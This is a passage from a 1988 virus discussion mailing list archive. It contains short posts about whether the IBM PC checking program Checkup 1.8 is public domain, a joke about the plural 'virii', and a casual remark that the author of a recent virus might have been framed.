  4225. =========================================================================
  4226. Date:         Mon, 7 Nov 88 15:41:00 MST
  4227. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  4228. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  4229. From:         LYPOWY@UNCAMULT
  4230. Subject:      Re: CHECKUP 1.8
  4231. In-Reply-To:  Message of 4 Nov 88 07:08 MST from "David A. Bader"
  4232.  
  4233.     Date:  4 November 1988 07:08 mst
  4234.     From:  David A. Bader <DAB3 at LEHIGH>
  4235.     Subject:  CHECKUP 1.8
  4236.  
  4237.     A number of people have sent me flames because I did not specify what
  4238.     machine I was working with when I mentioned Checkup 1.8.. I apologize,
  4239.     it is written for an IBM Microcomputer type system.
  4240.        -David Bader
  4241.        DAB3@LEHIGH
  4242.  
  4243.  
  4244. David, is this program PD or commercial??
  4245.  
  4246.                               Greg.
  4247. =========================================================================
  4248. Date:         Mon, 7 Nov 88 20:08:37 EST
  4249. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  4250. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  4251. From:         "David A. Bader" <DAB3@LEHIGH>
  4252. Subject:      CHECKUP 1.8 for the IBM
  4253.  
  4254. >From:         LYPOWY@UNCAMULT
  4255. >Subject:      Re: CHECKUP 1.8
  4256. >To:           "David A. Bader" <DAB3@LEHIGH>
  4257. >In-Reply-To:  Message of 4 Nov 88 07:08 MST from "David A. Bader"
  4258. >
  4259. >    Date:  4 November 1988 07:08 mst
  4260. >    From:  David A. Bader <DAB3 at LEHIGH>
  4261. >    Subject:  CHECKUP 1.8
  4262. >
  4263. >   A number of people have sent me flames because I did not specify what
  4264. >   machine I was working with when I mentioned Checkup 1.8.. I apologize,
  4265. >   it is written for an IBM Microcomputer type system.
  4266. >      -David Bader
  4267. >      DAB3@LEHIGH
  4268. >
  4269. >
  4270. >David, is this program PD or commercial??
  4271. >
  4272. >                             Greg.
  4273.  
  4274. Greg,
  4275. It is a PD program (am not sure about whether or not it is "Shareware"
  4276. , "Freeware", or something unique like that; but you do not need to
  4277. spend money initially to acquire it.)
  4278.        -David Bader
  4279.        DAB3@LEHIGH
  4280. =========================================================================
  4281. Date:         Mon, 7 Nov 88 09:16:53 EST
  4282. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  4283. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  4284. From:         Ben Chi <BEC@ALBNYVM1>
  4285. Subject:      Please!
  4286.  
  4287. What's all this about virii?  "Virii" is the plural of "virius."  If you
  4288. mean more than one virus, try "viruses" or, if you must, "viri."
  4289.  
  4290. On the other hand, we could let
  4291.  
  4292.               virii = 2 viruses
  4293.              viriii = 3 viruses
  4294.               viriv = 4 viruses
  4295.                virv = 5 viruses
  4296.                       etc.
  4297. =========================================================================
  4298. Date:         Mon, 7 Nov 88 14:11:16 CST
  4299. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  4300. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  4301. From:         C397739@UMCVMB
  4302.  
  4303. just a side note (ha ha oh well) on this virus from
  4304. this weekend..
  4305.  
  4306. an astute  friend of mine said that he couldnt beleive the dude who
  4307. wrote the virus allowed himself to be caught, which makes sense to me.
  4308.  
  4309. if they get evidence on the person, it must surely be a frame job, right?